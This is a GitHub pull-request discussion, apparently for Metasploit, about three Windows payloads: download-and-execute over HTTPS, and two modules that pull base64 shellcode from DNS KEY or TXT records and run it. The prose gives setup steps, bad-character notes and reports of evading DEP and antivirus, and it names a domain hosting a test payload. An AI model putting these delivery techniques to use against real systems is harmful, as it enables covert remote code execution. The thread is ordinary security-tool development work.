Added 3 new payloads #173

Closed
wants to merge 19 commits into
from

Projects

None yet

4 participants

@corelanc0d3r
Contributor

Payload 1 : download_exec_https.rb
This payload allows you to download a binary (don't think it needs to have .exe extension) from a webserver. (You need to host the binary and the webserver yourself).
The payload will download the file over HTTPS, using the IE proxy settings, drops the file on the target system (you can choose the filename) and runs it.

Payload 2 : dns_query_exec.rb
This payload allows you to read & execute shellcode from the reply for a KEY DNS record.
In order to make this work, you need the following things

  1. Register a public DNS zone & make sure you can create KEY (not DNSSEC) records. Alternatively, register a DNS zone, make the NS record point to your public IP & host your own DNS server
  2. Create the shellcode you want to execute. Write the shellcode to a file and base64 encode it.
  3. Create a KEY DNS record and paste in the base64 encoded shellcode as key
  4. Generate the dns_query_exec payload, using the FQDN of the newly created KEY record and use that in your exploit

Upon execution of the dns_query_exec payload, a DNS query will be performed. The corporate DNS server, or online DNS servers should be more than happy to get the KEY for you so you can read it & execute it.
Or, in other words, this allows you to retrieve bigger payload from a remote system without connecting to it :)

Payload 3 : dns_txt_query_exec.rb

This one will retrieve all TXT records for a given domain, retrieve individual shellcode parts (based on tags that contain a sequence) from the TXT records, put them in the correct order, and execute them.

If you want to test, I have set up domain corelan.eu with payload (simple messagebox).(3 TXT records)
Usage instructions are inside the payload module

@corelanc0d3r
Contributor

Regarding the DNS KEY query : I noticed that, on Windows7, the shellcode you want to deliver should exclude \x00, \x0a and \x0d (before the base64 action). (Just a convention I guess)

Other than that, delivering a meterpreter via the DNS key record works fine on XP SP3 with DEP on, and win7 wow64 (with DEP AlwaysOn, and Avast running)

@wchen-r7
Contributor

So after discussing with egyp7 and hdm, we have concluded that (for the HTTPS download module):

  • It is best to use one option (datastore['URI']) instead of multiple ('URI', 'RHOST', 'RPORT'). You can pass just 'URI', and then break it down in ruby.
  • It needs a configurable EXITFUNC
  • It needs a title more similar to windows/download_exec.
  • It should probably reject non HTTPS URLs, because the module is hardcoded to do HTTPS.
@wchen-r7
Contributor

Another comment from HD: It is doing a 8MB allocation in order to write to the disk. It really should be reading from internet handle/writing to file in one go. That way it doesn't even need virtualalloc, etc.

@wchen-r7
Contributor

Lastly, there are two calls to ExitProcess, should be combined.

Let me close this pull request for now. When it's fixed I'll reopen again (or let me know in case I'm not paying attention). Thanks.

@wchen-r7 wchen-r7 closed this Feb 14, 2012
@corelanc0d3r
Contributor

please reopen so I can submit changes :

  • implemented exitfunc support (and removed the hardcoded exitprocess call from original meterpreter code)
  • changed title & description
  • moved target into a single URL parameter (don't care about protocol, always uses https)

I'll work on the last requirement too (writing directly to file)
tx

@corelanc0d3r
Contributor

just to be sure about the virtualalloc vs write to file directly :

  • virtualalloc increases process memory
  • write directly to file requires some space on the stack, and some code to set this up.

Total length of payload may not be a lot smaller when writing directly to file, and because of stackadjust, we may hit top of stack (unlikely, but you never know)

I'll write it the way you think is best, I just want to make sure I understand why you prefer one over the other

tx

@todb-r7 todb-r7 reopened this Feb 14, 2012
@corelanc0d3r
Contributor

I think we will be able to replace the existing download_exec file with this new version, which supports http, https and ftp (it decides which protocol to use based on what the user provided in the URL parameter).
I tested https and http, didn't test ftp yet... but wanted to commit before I leave on travel

@todb-r7
Contributor
todb-r7 commented Mar 19, 2012

Tested the http and the DNS txt payloads, the http one works like a champ, the DNS one, not so much -- the target only seems to query the first part of the 3 part payload (target was win2k3 sp

I'm going to snag the http payload directly and just commit that one to close the pull request -- can you take a look at the two DNS payloads and see what's up that? Target is win2k3 sp2, I have a pcap here:

http://www.pcapr.net/view/todb/2012/2/1/13/1.pcap.html

@todb-r7 todb-r7 pushed a commit that closed this pull request Mar 19, 2012
@corelanc0d3r @todb corelanc0d3r + todb Adding corelandc0d3r's http/https/ftp payload
Picks up the one http/https/ftp payload, but not the other two DNS
payloads listed as part of the original pull request.

[Closes #173]
a3035dc
@todb-r7 todb-r7 closed this in a3035dc Mar 19, 2012
@todb-r7
Contributor
todb-r7 commented Mar 19, 2012

If you can confirm that the dns stuff works, please reopen the pull request

@corelanc0d3r
Contributor

I know what the issue is - I'll rewrite the module entirely (and work with ChrisJohnRiley to see if we can also build a DNS server payload hoster that would be compatible with the payload)... I'll open a new/separate pull request when I'm done

@corelanc0d3r
Contributor

check your mail

@ffr4nz
ffr4nz commented Apr 11, 2012

Great job.
We present a malware distribution method using 3rd party Cache DNS last year in RootedCON. Maybe you can use in your payload...
2011 Malware distribution: http://www.slideshare.net/rootedcon/francisco-jess-gmez-carlos-juan-diaz-cloud-malware-distribution-dns-will-be-your-friend-rootedcon-2011
2012 Data leak: http://www.slideshare.net/ffranz/rootedcon2012-dns-a-botnet-dialect-carlos-diaz-francisco-j-gomez

Cheers!

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment